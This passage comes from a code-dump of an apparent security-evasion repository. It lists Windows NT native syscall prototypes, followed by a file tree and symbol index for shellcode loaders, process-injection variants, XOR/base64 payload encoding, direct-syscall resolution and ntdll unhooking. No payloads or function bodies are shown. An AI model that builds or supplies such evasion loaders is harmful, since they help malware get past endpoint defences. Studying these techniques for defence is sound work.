IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenResourceManager(
OUT PHANDLE ResourceManagerHandle,
IN ACCESS_MASK DesiredAccess,
IN HANDLE TmHandle,
IN LPGUID ResourceManagerGuid OPTIONAL,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);
EXTERN_C NTSTATUS NtOpenSemaphore(
OUT PHANDLE SemaphoreHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenSession(
OUT PHANDLE SessionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenSymbolicLinkObject(
OUT PHANDLE LinkHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenThread(
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL);
EXTERN_C NTSTATUS NtOpenTimer(
OUT PHANDLE TimerHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenTransaction(
OUT PHANDLE TransactionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN LPGUID Uow,
IN HANDLE TmHandle OPTIONAL);
EXTERN_C NTSTATUS NtOpenTransactionManager(
OUT PHANDLE TmHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PUNICODE_STRING LogFileName OPTIONAL,
IN LPGUID TmIdentity OPTIONAL,
IN ULONG OpenOptions OPTIONAL);
EXTERN_C NTSTATUS NtPlugPlayControl(
IN PLUGPLAY_CONTROL_CLASS PnPControlClass,
IN OUT PVOID PnPControlData,
IN ULONG PnPControlDataLength);
EXTERN_C NTSTATUS NtPrePrepareComplete(
IN HANDLE EnlistmentHandle,
IN PLARGE_INTEGER TmVirtualClock OPTIONAL);
EXTERN_C NTSTATUS NtPrePrepareEnlistment(
IN HANDLE EnlistmentHandle,
IN PLARGE_INTEGER TmVirtualClock OPTIONAL);
EXTERN_C NTSTATUS NtPrepareComplete(
IN HANDLE EnlistmentHandle,
IN PLARGE_INTEGER TmVirtualClock OPTIONAL);
EXTERN_C NTSTATUS NtPrepareEnlistment(
IN HANDLE EnlistmentHandle,
IN PLARGE_INTEGER TmVirtualClock OPTIONAL);
EXTERN_C NTSTATUS NtPrivilegeCheck(
IN HANDLE ClientToken,
IN OUT PPRIVILEGE_SET RequiredPrivileges,
OUT PBOOLEAN Result);
EXTERN_C NTSTATUS NtPrivilegeObjectAuditAlarm(
IN PUNICODE_STRING SubsystemName,
IN PVOID HandleId OPTIONAL,
IN HANDLE ClientToken,
IN ACCESS_MASK DesiredAccess,
IN PPRIVILEGE_SET Privileges,
IN BOOLEAN AccessGranted);
EXTERN_C NTSTATUS NtPrivilegedServiceAuditAlarm(
IN PUNICODE_STRING SubsystemName,
IN PUNICODE_STRING ServiceName,
IN HANDLE ClientToken,
IN PPRIVILEGE_SET Privileges,
IN BOOLEAN AccessGranted);
EXTERN_C NTSTATUS NtPropagationComplete(
IN HANDLE ResourceManagerHandle,
IN ULONG RequestCookie,
IN ULONG BufferLength,
IN PVOID Buffer);
EXTERN_C NTSTATUS NtPropagationFailed(
IN HANDLE ResourceManagerHandle,
IN ULONG RequestCookie,
IN NTSTATUS PropStatus);
EXTERN_C NTSTATUS NtPulseEvent(
IN HANDLE EventHandle,
OUT PULONG PreviousState OPTIONAL);
EXTERN_C NTSTATUS NtQueryAuxiliaryCounterFrequency(
OUT PULONGLONG lpAuxiliaryCounterFrequency);
EXTERN_C NTSTATUS NtQueryBootEntryOrder(
OUT PULONG Ids OPTIONAL,
IN OUT PULONG Count);
EXTERN_C NTSTATUS NtQueryBootOptions(
OUT PBOOT_OPTIONS BootOptions OPTIONAL,
IN OUT PULONG BootOptionsLength);
EXTERN_C NTSTATUS NtQueryDebugFilterState(
IN ULONG ComponentId,
IN ULONG Level);
EXTERN_C NTSTATUS NtQueryDirectoryFileEx(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass,
IN ULONG QueryFlags,
IN PUNICODE_STRING FileName OPTIONAL);
EXTERN_C NTSTATUS NtQueryDirectoryObject(
IN HANDLE DirectoryHandle,
OUT PVOID Buffer OPTIONAL,
IN ULONG Length,
IN BOOLEAN ReturnSingleEntry,
IN BOOLEAN RestartScan,
IN OUT PULONG Context,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryDriverEntryOrder(
IN PULONG Ids OPTIONAL,
IN OUT PULONG Count);
EXTERN_C NTSTATUS NtQueryEaFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PFILE_FULL_EA_INFORMATION Buffer,
IN ULONG Length,
IN BOOLEAN ReturnSingleEntry,
IN PFILE_GET_EA_INFORMATION EaList OPTIONAL,
IN ULONG EaListLength,
IN PULONG EaIndex OPTIONAL,
IN BOOLEAN RestartScan);
EXTERN_C NTSTATUS NtQueryFullAttributesFile(
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PFILE_NETWORK_OPEN_INFORMATION FileInformation);
EXTERN_C NTSTATUS NtQueryInformationAtom(
IN USHORT Atom,
IN ATOM_INFORMATION_CLASS AtomInformationClass,
OUT PVOID AtomInformation,
IN ULONG AtomInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationByName(
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass);
EXTERN_C NTSTATUS NtQueryInformationEnlistment(
IN HANDLE EnlistmentHandle,
IN ENLISTMENT_INFORMATION_CLASS EnlistmentInformationClass,
OUT PVOID EnlistmentInformation,
IN ULONG EnlistmentInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationJobObject(
IN HANDLE JobHandle,
IN JOBOBJECTINFOCLASS JobObjectInformationClass,
OUT PVOID JobObjectInformation,
IN ULONG JobObjectInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationPort(
IN HANDLE PortHandle,
IN PORT_INFORMATION_CLASS PortInformationClass,
OUT PVOID PortInformation,
IN ULONG Length,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationResourceManager(
IN HANDLE ResourceManagerHandle,
IN RESOURCEMANAGER_INFORMATION_CLASS ResourceManagerInformationClass,
OUT PVOID ResourceManagerInformation,
IN ULONG ResourceManagerInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationTransaction(
IN HANDLE TransactionHandle,
IN TRANSACTION_INFORMATION_CLASS TransactionInformationClass,
OUT PVOID TransactionInformation,
IN ULONG TransactionInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationTransactionManager(
IN HANDLE TransactionManagerHandle,
IN TRANSACTIONMANAGER_INFORMATION_CLASS TransactionManagerInformationClass,
OUT PVOID TransactionManagerInformation,
IN ULONG TransactionManagerInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationWorkerFactory(
IN HANDLE WorkerFactoryHandle,
IN WORKERFACTORYINFOCLASS WorkerFactoryInformationClass,
OUT PVOID WorkerFactoryInformation,
IN ULONG WorkerFactoryInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInstallUILanguage(
OUT PLANGID InstallUILanguageId);
EXTERN_C NTSTATUS NtQueryIntervalProfile(
IN KPROFILE_SOURCE ProfileSource,
OUT PULONG Interval);
EXTERN_C NTSTATUS NtQueryIoCompletion(
IN HANDLE IoCompletionHandle,
IN IO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass,
OUT PVOID IoCompletionInformation,
IN ULONG IoCompletionInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryLicenseValue(
IN PUNICODE_STRING ValueName,
OUT PULONG Type OPTIONAL,
OUT PVOID SystemData OPTIONAL,
IN ULONG DataSize,
OUT PULONG ResultDataSize);
EXTERN_C NTSTATUS NtQueryMultipleValueKey(
IN HANDLE KeyHandle,
IN OUT PKEY_VALUE_ENTRY ValueEntries,
IN ULONG EntryCount,
OUT PVOID ValueBuffer,
IN PULONG BufferLength,
OUT PULONG RequiredBufferLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryMutant(
IN HANDLE MutantHandle,
IN MUTANT_INFORMATION_CLASS MutantInformationClass,
OUT PVOID MutantInformation,
IN ULONG MutantInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryOpenSubKeys(
IN POBJECT_ATTRIBUTES TargetKey,
OUT PULONG HandleCount);
EXTERN_C NTSTATUS NtQueryOpenSubKeysEx(
IN POBJECT_ATTRIBUTES TargetKey,
IN ULONG BufferLength,
OUT PVOID Buffer,
OUT PULONG RequiredSize);
EXTERN_C NTSTATUS NtQueryPortInformationProcess();
EXTERN_C NTSTATUS NtQueryQuotaInformationFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PFILE_USER_QUOTA_INFORMATION Buffer,
IN ULONG Length,
IN BOOLEAN ReturnSingleEntry,
IN PFILE_QUOTA_LIST_INFORMATION SidList OPTIONAL,
IN ULONG SidListLength,
IN PSID StartSid OPTIONAL,
IN BOOLEAN RestartScan);
EXTERN_C NTSTATUS NtQuerySecurityAttributesToken(
IN HANDLE TokenHandle,
IN PUNICODE_STRING Attributes OPTIONAL,
IN ULONG NumberOfAttributes,
OUT PVOID Buffer,
IN ULONG Length,
OUT PULONG ReturnLength);
EXTERN_C NTSTATUS NtQuerySecurityObject(
IN HANDLE Handle,
IN SECURITY_INFORMATION SecurityInformation,
OUT PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
IN ULONG Length,
OUT PULONG LengthNeeded);
EXTERN_C NTSTATUS NtQuerySecurityPolicy(
IN ULONG_PTR UnknownParameter1,
IN ULONG_PTR UnknownParameter2,
IN ULONG_PTR UnknownParameter3,
IN ULONG_PTR UnknownParameter4,
IN ULONG_PTR UnknownParameter5,
IN ULONG_PTR UnknownParameter6);
EXTERN_C NTSTATUS NtQuerySemaphore(
IN HANDLE SemaphoreHandle,
IN SEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass,
OUT PVOID SemaphoreInformation,
IN ULONG SemaphoreInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQuerySymbolicLinkObject(
IN HANDLE LinkHandle,
IN OUT PUNICODE_STRING LinkTarget,
OUT PULONG ReturnedLength OPTIONAL);
EXTERN_C NTSTATUS NtQuerySystemEnvironmentValue(
IN PUNICODE_STRING VariableName,
OUT PVOID VariableValue,
IN ULONG ValueLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQuerySystemEnvironmentValueEx(
IN PUNICODE_STRING VariableName,
IN LPGUID VendorGuid,
OUT PVOID Value OPTIONAL,
IN OUT PULONG ValueLength,
OUT PULONG Attributes OPTIONAL);
EXTERN_C NTSTATUS NtQuerySystemInformationEx(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN PVOID InputBuffer,
IN ULONG InputBufferLength,
OUT PVOID SystemInformation OPTIONAL,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryTimerResolution(
OUT PULONG MaximumTime,
OUT PULONG MinimumTime,
OUT PULONG CurrentTime);
EXTERN_C NTSTATUS NtQueryWnfStateData(
IN PCWNF_STATE_NAME StateName,
IN PCWNF_TYPE_ID TypeId OPTIONAL,
IN PVOID ExplicitScope OPTIONAL,
OUT PWNF_CHANGE_STAMP ChangeStamp,
OUT PVOID Buffer OPTIONAL,
IN OUT PULONG BufferSize);
EXTERN_C NTSTATUS NtQueryWnfStateNameInformation(
IN PCWNF_STATE_NAME StateName,
IN PCWNF_TYPE_ID NameInfoClass,
IN PVOID ExplicitScope OPTIONAL,
OUT
gitextract_5ot6inlx/
├── README.md
├── chapter4-demo1/
│ ├── demo1/
│ │ ├── Debug/
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.obj.enc
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ └── vc142.pdb
│ │ ├── Header.h
│ │ ├── base64.cpp
│ │ ├── base64.h
│ │ ├── demo1.cpp
│ │ ├── demo1.vcxproj
│ │ ├── demo1.vcxproj.filters
│ │ ├── demo1.vcxproj.user
│ │ └── x64/
│ │ ├── Debug/
│ │ │ ├── base64.obj
│ │ │ ├── demo1.exe.recipe
│ │ │ ├── demo1.ilk
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ ├── vc142.pdb
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ │ └── Release/
│ │ ├── base64.obj
│ │ ├── demo1.exe.recipe
│ │ ├── demo1.iobj
│ │ ├── demo1.ipdb
│ │ ├── demo1.log
│ │ ├── demo1.obj
│ │ ├── demo1.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── demo1.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ └── link.write.1.tlog
│ │ └── vc143.pdb
│ ├── demo1.sln
│ └── enc.py
├── chapter4-demo2/
│ ├── demo1/
│ │ ├── Debug/
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.obj.enc
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ └── vc142.pdb
│ │ ├── Header.h
│ │ ├── base64.cpp
│ │ ├── base64.h
│ │ ├── demo1 - 快捷方式.lnk
│ │ ├── demo1.cpp
│ │ ├── demo1.vcxproj
│ │ ├── demo1.vcxproj.filters
│ │ ├── demo1.vcxproj.user
│ │ ├── nt.asm
│ │ ├── nt.h
│ │ └── x64/
│ │ ├── Debug/
│ │ │ ├── base64.obj
│ │ │ ├── demo1.exe.recipe
│ │ │ ├── demo1.ilk
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ ├── vc142.pdb
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ │ └── Release/
│ │ ├── base64.obj
│ │ ├── demo1.exe.recipe
│ │ ├── demo1.iobj
│ │ ├── demo1.ipdb
│ │ ├── demo1.log
│ │ ├── demo1.obj
│ │ ├── demo1.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── Masm.read.1u.tlog
│ │ │ ├── Masm.write.1u.tlog
│ │ │ ├── demo1.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ └── link.write.1.tlog
│ │ ├── nt.obj
│ │ └── vc143.pdb
│ ├── demo1.sln
│ └── enc.py
├── chapter4-demo3/
│ ├── demo1/
│ │ ├── Debug/
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.obj.enc
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ └── vc142.pdb
│ │ ├── Header.h
│ │ ├── base64.cpp
│ │ ├── base64.h
│ │ ├── demo1 - 快捷方式.lnk
│ │ ├── demo1.cpp
│ │ ├── demo1.vcxproj
│ │ ├── demo1.vcxproj.filters
│ │ ├── demo1.vcxproj.user
│ │ ├── nt.asm
│ │ ├── nt.h
│ │ └── x64/
│ │ ├── Debug/
│ │ │ ├── base64.obj
│ │ │ ├── demo1.exe.recipe
│ │ │ ├── demo1.ilk
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ ├── vc142.pdb
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ │ └── Release/
│ │ ├── base64.obj
│ │ ├── demo1.exe.recipe
│ │ ├── demo1.iobj
│ │ ├── demo1.ipdb
│ │ ├── demo1.log
│ │ ├── demo1.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── Masm.read.1u.tlog
│ │ │ ├── Masm.write.1u.tlog
│ │ │ ├── demo1.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ ├── link.write.1.tlog
│ │ │ └── unsuccessfulbuild
│ │ ├── nt.obj
│ │ └── vc143.pdb
│ └── demo1.sln
├── chapter4-demo4/
│ ├── CODE_OF_CONDUCT.md
│ ├── LICENSE.txt
│ ├── README.md
│ ├── ShellcodeFluctuation/
│ │ ├── ShellcodeFluctuation.vcxproj
│ │ ├── ShellcodeFluctuation.vcxproj.filters
│ │ ├── ShellcodeFluctuation.vcxproj.user
│ │ ├── base64.cpp
│ │ ├── base64.h
│ │ ├── header.h
│ │ ├── main.cpp
│ │ └── x64/
│ │ ├── Debug/
│ │ │ ├── Shellcod.9eed9e19.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── ShellcodeFluctuation.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── ShellcodeFluctuation.exe.recipe
│ │ │ ├── ShellcodeFluctuation.ilk
│ │ │ ├── ShellcodeFluctuation.log
│ │ │ ├── base64.obj
│ │ │ ├── main.obj
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ │ └── Release/
│ │ ├── Shellcod.9eed9e19.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── ShellcodeFluctuation.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ └── link.write.1.tlog
│ │ ├── ShellcodeFluctuation.exe.recipe
│ │ ├── ShellcodeFluctuation.iobj
│ │ ├── ShellcodeFluctuation.ipdb
│ │ ├── ShellcodeFluctuation.log
│ │ ├── base64.obj
│ │ ├── main.obj
│ │ └── vc143.pdb
│ ├── ShellcodeFluctuation.sln
│ └── x64/
│ ├── Debug/
│ │ └── ShellcodeFluctuation.pdb
│ └── Release/
│ └── ShellcodeFluctuation.pdb
├── demo1/
│ ├── README.md
│ └── shellcode_execute/
│ └── shellcode_execute/
│ ├── shellcode_execute/
│ │ ├── resource.h
│ │ ├── shellcode_execute.aps
│ │ ├── shellcode_execute.cpp
│ │ ├── shellcode_execute.rc
│ │ ├── shellcode_execute.vcxproj
│ │ ├── shellcode_execute.vcxproj.filters
│ │ └── shellcode_execute.vcxproj.user
│ └── shellcode_execute.sln
├── demo2/
│ ├── README.md
│ └── shellcode_execut3/
│ ├── shellcode_execut3/
│ │ ├── App.config
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ └── shellcode_execut3.csproj
│ └── shellcode_execut3.sln
├── demo3/
│ ├── README.md
│ └── SharpInjector-master/
│ ├── .gitignore
│ ├── README.md
│ ├── ScEncryptor/
│ │ ├── App.config
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ └── ScEncryptor.csproj
│ ├── SharpInjector/
│ │ ├── App.config
│ │ ├── CreateFiber.cs
│ │ ├── CreateRemoteThread.cs
│ │ ├── CreateRemoteThreadEx.cs
│ │ ├── CreateThread.cs
│ │ ├── EtwpCreateEtwThread.cs
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ ├── AssemblyInfo.cs
│ │ │ ├── Resource1.Designer.cs
│ │ │ └── Resource1.resx
│ │ ├── QueueUserAPC.cs
│ │ ├── RtlCreateUserThread.cs
│ │ ├── SharpInjector.csproj
│ │ ├── Shellycode.cs
│ │ └── WinAPI.cs
│ └── SharpInjector.sln
├── demo4/
│ └── syscall/
│ ├── syscall/
│ │ ├── Syscall.asm
│ │ ├── syscall.vcxproj
│ │ ├── syscall.vcxproj.filters
│ │ ├── syscall.vcxproj.user
│ │ ├── syscall_call.cpp
│ │ └── x64/
│ │ └── Debug/
│ │ ├── Syscall.obj
│ │ ├── syscall.exe.recipe
│ │ ├── syscall.ilk
│ │ ├── syscall.log
│ │ ├── syscall.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── Masm.read.1u.tlog
│ │ │ ├── Masm.write.1u.tlog
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ ├── link.write.1.tlog
│ │ │ └── syscall.lastbuildstate
│ │ ├── syscall_call.obj
│ │ ├── vc143.idb
│ │ └── vc143.pdb
│ └── syscall.sln
├── demo5/
│ └── syscall3/
│ ├── syscall3/
│ │ ├── 1-asm.x64.asm
│ │ ├── 1.cpp
│ │ ├── 1.h
│ │ ├── syscall3.cpp
│ │ ├── syscall3.vcxproj
│ │ ├── syscall3.vcxproj.filters
│ │ └── syscall3.vcxproj.user
│ └── syscall3.sln
└── demo6/
├── unhook_demo/
│ ├── Header.h
│ ├── unhook_demo.cpp
│ ├── unhook_demo.vcxproj
│ ├── unhook_demo.vcxproj.filters
│ └── unhook_demo.vcxproj.user
└── unhook_demo.sln
SYMBOL INDEX (320 symbols across 34 files)
FILE: chapter4-demo1/demo1/Header.h
function XOR_KEY (line 3) | const int XOR_KEY{ 8 }
FILE: chapter4-demo1/demo1/base64.cpp
function pos_of_char (line 55) | static unsigned int pos_of_char(const unsigned char chr) {
function insert_linebreaks (line 73) | static std::string insert_linebreaks(std::string str, size_t distance) {
function encode_with_line_breaks (line 92) | static std::string encode_with_line_breaks(String s) {
function encode_pem (line 97) | static std::string encode_pem(String s) {
function encode_mime (line 102) | static std::string encode_mime(String s) {
function encode (line 107) | static std::string encode(String s, bool url) {
function base64_encode (line 111) | std::string base64_encode(unsigned char const* bytes_to_encode, size_t i...
function decode (line 163) | static std::string decode(String encoded_string, bool remove_linebreaks) {
function base64_decode (line 243) | std::string base64_decode(std::string const& s, bool remove_linebreaks) {
function base64_encode (line 247) | std::string base64_encode(std::string const& s, bool url) {
function base64_encode_pem (line 251) | std::string base64_encode_pem(std::string const& s) {
function base64_encode_mime (line 255) | std::string base64_encode_mime(std::string const& s) {
function base64_encode (line 266) | std::string base64_encode(std::string_view s, bool url) {
function base64_encode_pem (line 270) | std::string base64_encode_pem(std::string_view s) {
function base64_encode_mime (line 274) | std::string base64_encode_mime(std::string_view s) {
function base64_decode (line 278) | std::string base64_decode(std::string_view s, bool remove_linebreaks) {
FILE: chapter4-demo1/demo1/demo1.cpp
function main (line 45) | int main()
FILE: chapter4-demo2/demo1/Header.h
function XOR_KEY (line 3) | const int XOR_KEY{ 8 }
function std (line 6) | const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000,
FILE: chapter4-demo2/demo1/base64.cpp
function pos_of_char (line 55) | static unsigned int pos_of_char(const unsigned char chr) {
function insert_linebreaks (line 73) | static std::string insert_linebreaks(std::string str, size_t distance) {
function encode_with_line_breaks (line 92) | static std::string encode_with_line_breaks(String s) {
function encode_pem (line 97) | static std::string encode_pem(String s) {
function encode_mime (line 102) | static std::string encode_mime(String s) {
function encode (line 107) | static std::string encode(String s, bool url) {
function base64_encode (line 111) | std::string base64_encode(unsigned char const* bytes_to_encode, size_t i...
function decode (line 163) | static std::string decode(String encoded_string, bool remove_linebreaks) {
function base64_decode (line 243) | std::string base64_decode(std::string const& s, bool remove_linebreaks) {
function base64_encode (line 247) | std::string base64_encode(std::string const& s, bool url) {
function base64_encode_pem (line 251) | std::string base64_encode_pem(std::string const& s) {
function base64_encode_mime (line 255) | std::string base64_encode_mime(std::string const& s) {
function base64_encode (line 266) | std::string base64_encode(std::string_view s, bool url) {
function base64_encode_pem (line 270) | std::string base64_encode_pem(std::string_view s) {
function base64_encode_mime (line 274) | std::string base64_encode_mime(std::string_view s) {
function base64_decode (line 278) | std::string base64_decode(std::string_view s, bool remove_linebreaks) {
FILE: chapter4-demo2/demo1/demo1.cpp
function replace (line 47) | std::string replace(const std::string& inStr, const char* pSrc, const ch...
function LPVOID (line 74) | LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocG...
function main (line 108) | int main()
FILE: chapter4-demo3/demo1/Header.h
function XOR_KEY (line 3) | const int XOR_KEY{ 8 }
function std (line 6) | const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000,
FILE: chapter4-demo3/demo1/base64.cpp
function pos_of_char (line 55) | static unsigned int pos_of_char(const unsigned char chr) {
function insert_linebreaks (line 73) | static std::string insert_linebreaks(std::string str, size_t distance) {
function encode_with_line_breaks (line 92) | static std::string encode_with_line_breaks(String s) {
function encode_pem (line 97) | static std::string encode_pem(String s) {
function encode_mime (line 102) | static std::string encode_mime(String s) {
function encode (line 107) | static std::string encode(String s, bool url) {
function base64_encode (line 111) | std::string base64_encode(unsigned char const* bytes_to_encode, size_t i...
function decode (line 163) | static std::string decode(String encoded_string, bool remove_linebreaks) {
function base64_decode (line 243) | std::string base64_decode(std::string const& s, bool remove_linebreaks) {
function base64_encode (line 247) | std::string base64_encode(std::string const& s, bool url) {
function base64_encode_pem (line 251) | std::string base64_encode_pem(std::string const& s) {
function base64_encode_mime (line 255) | std::string base64_encode_mime(std::string const& s) {
function base64_encode (line 266) | std::string base64_encode(std::string_view s, bool url) {
function base64_encode_pem (line 270) | std::string base64_encode_pem(std::string_view s) {
function base64_encode_mime (line 274) | std::string base64_encode_mime(std::string_view s) {
function base64_decode (line 278) | std::string base64_decode(std::string_view s, bool remove_linebreaks) {
FILE: chapter4-demo3/demo1/demo1.cpp
function replace (line 47) | std::string replace(const std::string& inStr, const char* pSrc, const ch...
function LPVOID (line 74) | LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocG...
function EXTERN_C (line 110) | EXTERN_C PVOID internal_cleancall_wow64_gate(VOID) {
function BOOL (line 114) | __declspec(naked) BOOL local_is_wow64(void)
function DWORD (line 142) | DWORD SW3_HashSyscall(PCSTR FunctionName)
function PVOID (line 157) | PVOID SC_Address(PVOID NtApiAddress)
function PVOID (line 162) | PVOID SC_Address(PVOID NtApiAddress)
function BOOL (line 242) | BOOL SW3_PopulateSyscallList()
function EXTERN_C (line 334) | EXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash)
function EXTERN_C (line 350) | EXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash)
function EXTERN_C (line 366) | EXTERN_C PVOID SW3_GetRandomSyscallAddress(DWORD FunctionHash)
function main (line 382) | int main()
FILE: chapter4-demo3/demo1/nt.h
type SW3_SYSCALL_ENTRY (line 42) | typedef struct _SW3_SYSCALL_ENTRY
